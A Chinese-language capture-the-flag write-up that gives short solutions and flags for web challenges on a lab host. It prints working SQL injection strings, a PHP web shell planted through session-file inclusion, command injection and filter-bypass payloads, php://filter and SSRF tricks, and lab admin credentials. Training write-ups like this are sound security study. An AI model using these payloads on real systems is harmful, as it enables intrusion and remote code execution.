由題目可知,與 git leak 有關
測試發現路徑 .git/config
存在
使用 scrabble 工具進行萃取,獲得原始碼
FLAG{gitleak_is_fun}
由題目可知與 .DS_Store
有關
在 .DS_Store
路徑下確實看到以下資訊
進入後得到 flag
FLAG{.DS_Store is so annoying lmao}
account: ' or 1=1) -- #
FLAG{b4by_sql_inj3cti0n}
account: ') union select 'admin','pass' -- #
password: pass
FLAG{un10n_bas3d_sqli}
error based 掃描
掃出來的 password: hOTwBz4wf-fmiHBEKU6NXq-WmKOk8dyv_wchROLIzJM
再登入即可
FLAG{un10n_bas3d_sqli}
meow.php
FLAG{upl0ad_t0_pwn!!!}
meow.png.php
前面亂碼的部分是 png 的 file signature
FLAG{ext3ns10n_ch3ck_f4il3d}
檔案同 0x02
在上傳時 --boundry--
之間的 content-type 改成 image/png
FLAG{byp4ss_all_th3_things}
先查看 phpinfo 中有關 session 的儲存位置及名稱,這題儲存位置是在 /tmp
下,名稱是 PHPSESSID
讀取 /tmp/sess_<當前session>
,可發現儲存的是筆記的內容
新增筆記,內容為 <?php system($_GET['meow']); ?>
讀取 /tmp/sess_<當前session>
並帶上參數 meow=ls -al /
,即可進行 RCE
FLAG{include(LFI_to_RCE)}
讀取 /proc/1/mountinfo
檔案,發現 flag mount point
讀取 /flag_aff6136bbef82137
FLAG{include(LFI_to_RCE)}
使用 php 偽協議
http://h4ck3r.quest:8400/?page=php://filter/convert.base64-encode/resource=admin
進行 base64 decode 後,發現帳號密碼資訊
admin / kqqPFObwxU8HYo8E5QgNLhdOxvZmtPhyBCyDxCwpvAQ
登入拿 flag
FLAG{ezzzz_lfi}
payload: ';cat /flag_44ebd3936a907d59; #
FLAG{B4by_c0mmand_1njection!}
先 try wildcard: '"
ls /fla*" #
拿到 flag 名稱,取得檔案內容: '"
cat /fla''g_f4b9830a65d9e956" #
FLAG{Y0U_$(Byp4ssed)th3waf
}
欲塞入 payload:
需要將一些字元用 url encoding 處理
FLAG{b4by_xss_h4ck3r}
使用 gopher 協定
FLAG{gopher://http_post}
在原始碼中看到要填入的網址
使用工具: https://splitline.github.io/domain-obfuscator/
payload: hTtp:\/Ⓣℋᵉ.ⅽ⁰Ⓞ0o⓪Ⓛ-fl㊹④G。ₛℯℜvⒺR.㏌ⓣᴱℝ㎁ℒ
flag{C0o0o0oL_baby_ssrf_trick}
payload: http://localhost/debug?a=https://
FLAG{intro2ssrf}
使用以下 code,得知 flag 檔案名稱
讀取檔案
FLAG{p1ckle_r1ck}
使用以下 code,得知 flag 檔案名稱
讀取檔案
FLAG{d3serializable_c4t}
FLAG{magic_cat_pwnpwn}
得知 flag 檔案名稱
讀取檔案
FLAG{ssti.class.pwn}
CTF